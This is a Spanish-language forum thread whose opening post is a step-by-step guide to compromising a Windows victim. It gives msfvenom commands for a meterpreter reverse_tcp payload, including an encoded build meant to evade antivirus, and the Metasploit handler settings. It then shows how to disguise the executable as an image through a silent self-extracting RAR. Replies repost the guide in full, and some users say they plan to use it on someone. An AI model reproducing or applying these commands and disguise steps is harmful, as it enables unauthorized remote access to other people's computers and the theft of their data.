Cómo Hackear Windows con Metasploit Framework

Alexlealxd01

HISTORIADOR Y BIÓLOGO DEL FORO
Noderador
Nodero
Noder
30 Sep 2019
1.540
978
Hoy os enseñaré a hackear un dispositivo windows con un Metasploit

Necesitaremos lo siguiente:
  1. Kali Linux
  2. Windows
  3. Windows victima
Comencemos...

1. Crear Payload con Msfvenom

Ponemos msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP> LPORT=4444 -f exe > virus.exe

Paso 1.png


Una vez creado estará en nuestra carpeta personal.

Crearé un nuevo .exe encriptado por shikata_ga_nai y que evitará usar el caracter x00.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<TU IP> LPORT=4444 -f exe > virus_geek.exe

Paso 1_b.png


2. Iniciar Metasploit Framework

Usaremos este comando use exploit/multi/handler

Paso 2.png


Ahora podremos estos comandos

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <TU IP>
set LPORT 4444

Paso 2_b.png


3. Preparar explotación en una imagen

Para esto usaremos nuestra imagen seleccionada y un windows (en mi caso sera el mismo que la victima vero bueno :D )

Explotación-de-Windows-con-una-imagen.png


Lo comprimimos con las siguientes características

Configuración-de-archivo-RAR.png


Aqui no ponemos C:\ ,ya que sera mas facil descubrirlo como virus asi que monemos D:\ E:\

Opciones-RAR-Avanzado-y-Autoextraíble.png


Aquí lo pondremos de tal forma que la imagen este primero, y el archivo .exe este despues

Opciones-SFX-Instalación.png


Aquí pondremos la imagen que queremos que sea un icono :D en cargar icono desde fichero
Opciones-SFX-Texto-e-Icono.png


Aquí le daremos a ocultar todo

Opciones-SFX-Modos-Ocultar-todo.png


Aquí le daremos Sobrescribir todos los ficheros para que cuando se descomprima los archivos sean mandados al directorio indicado
Opciones-SFX-Actualizar-y-Sobreescribir.png


Ahora el trabajo esta listo :D solo queda esperar a que la victima abra el archivo

4. Hacking Windows 7

Hacking-Windows-con-imagen.png


Una vez que la victima abra el archivo nos saldrá su información

Ejemplos-de-comandos-Meterpreter.png
 

KTaneR

Activo muy miembro
Burgués de Nodo
Noderador
Nodero
Noder
25 Oct 2019
1.351
1.778
no lei nada, pero grandisimo post seguro, por lo menos uno sobre la tematica del foro y no de ganar dinero. Se agradece.
 

MXXGUI

Paga los ERTES primer aviso
Noderador
Nodero
Noder
6 Dic 2019
867
467
Ni me lo he leido pero lo guardo para hecharle un ojo en verano cnd no me esten bombardeando a examenes y me aburra para picar a alguien.
buen aporte
 

Alexlealxd01

HISTORIADOR Y BIÓLOGO DEL FORO
Noderador
Nodero
Noder
30 Sep 2019
1.540
978
Ni me lo he leido pero lo guardo para hecharle un ojo en verano cnd no me esten bombardeando a examenes y me aburra para picar a alguien.
buen aporte
si jajaj es una buena idea mañana subire mas jaja
 

DantrixX

𝑩𝒍𝒆𝒔𝒔𝒆𝒅 𝑩𝒐𝒚 🌌
Noderador
Nodero
Noder
30 Sep 2019
846
477
Buen post, largo de hacer y hecho para situaciones excepcionales de las cuales te puedes salvar. Grande loco.
 

Albertabera

Miembro muy activo
Noderador
Nodero
Noder
15 Sep 2019
981
689
Hoy os enseñaré a hackear un dispositivo windows con un Metasploit

Necesitaremos lo siguiente:
  1. Kali Linux
  2. Windows
  3. Windows victima
Comencemos...

1. Crear Payload con Msfvenom

Ponemos msfvenom -p windows/meterpreter/reverse_tcp LHOST=<TU IP> LPORT=4444 -f exe > virus.exe

Ver el archivo adjunto 3977

Una vez creado estará en nuestra carpeta personal.

Crearé un nuevo .exe encriptado por shikata_ga_nai y que evitará usar el caracter x00.

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 LHOST=<TU IP> LPORT=4444 -f exe > virus_geek.exe

Ver el archivo adjunto 3978

2. Iniciar Metasploit Framework

Usaremos este comando use exploit/multi/handler

Ver el archivo adjunto 3980

Ahora podremos estos comandos

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <TU IP>
set LPORT 4444

Ver el archivo adjunto 3981

3. Preparar explotación en una imagen

Para esto usaremos nuestra imagen seleccionada y un windows (en mi caso sera el mismo que la victima vero bueno :D )

Ver el archivo adjunto 3982

Lo comprimimos con las siguientes características

Ver el archivo adjunto 3983

Aqui no ponemos C:\ ,ya que sera mas facil descubrirlo como virus asi que monemos D:\ E:\

Ver el archivo adjunto 3984

Aquí lo pondremos de tal forma que la imagen este primero, y el archivo .exe este despues

Ver el archivo adjunto 3985

Aquí pondremos la imagen que queremos que sea un icono :D en cargar icono desde fichero
Ver el archivo adjunto 3986

Aquí le daremos a ocultar todo

Ver el archivo adjunto 3987

Aquí le daremos Sobrescribir todos los ficheros para que cuando se descomprima los archivos sean mandados al directorio indicado
Ver el archivo adjunto 3988

Ahora el trabajo esta listo :D solo queda esperar a que la victima abra el archivo

4. Hacking Windows 7

Ver el archivo adjunto 3989

Una vez que la victima abra el archivo nos saldrá su información

Ver el archivo adjunto 3990
Ya lo voy a utilizar
 

DVega

Miembro muy activo
Noder
25 Feb 2020
157
60
Ni me lo he leido pero lo guardo para hecharle un ojo en verano cnd no me esten bombardeando a examenes y me aburra para picar a alguien.
buen aporte
Ya somos 2, estoy haciendo una lista de cosas para el verano😂
Pero una pregunta, qué tipo de información se puede sacar al respecto?
 

elu61283

Miembro muy activo
Miembro del equipo
Jinete de Nodo
Burgués de Nodo
Moderador
Noderador
Nodero
Noder Élite
Noder
21 Ago 2019
2.125
4.179
Gracias por compartirlo! Muy buen post!
 

Sadsuke

Respetador de respetadores
Noderador
Nodero
Noder
26 Dic 2018
723
778
vine a este foro por este tipo de cosas gracias gran aporte
 

s3n4k

Miembro muy activo
29 Dic 2020
50
8
hola muy buenas, tengo un problema al hacerlo ya que cuando paso el archivo desde virtualvox a windows y lo abro, la consola en kali indica que sigue buscando y no encuentra el equipo, alguna solución? :(
 

Alexlealxd01

HISTORIADOR Y BIÓLOGO DEL FORO
Noderador
Nodero
Noder
30 Sep 2019
1.540
978
hola muy buenas, tengo un problema al hacerlo ya que cuando paso el archivo desde virtualvox a windows y lo abro, la consola en kali indica que sigue buscando y no encuentra el equipo, alguna solución? :(
Mira a ver si esta en tu misma red o estan en distintas NAT
 
Arriba Pie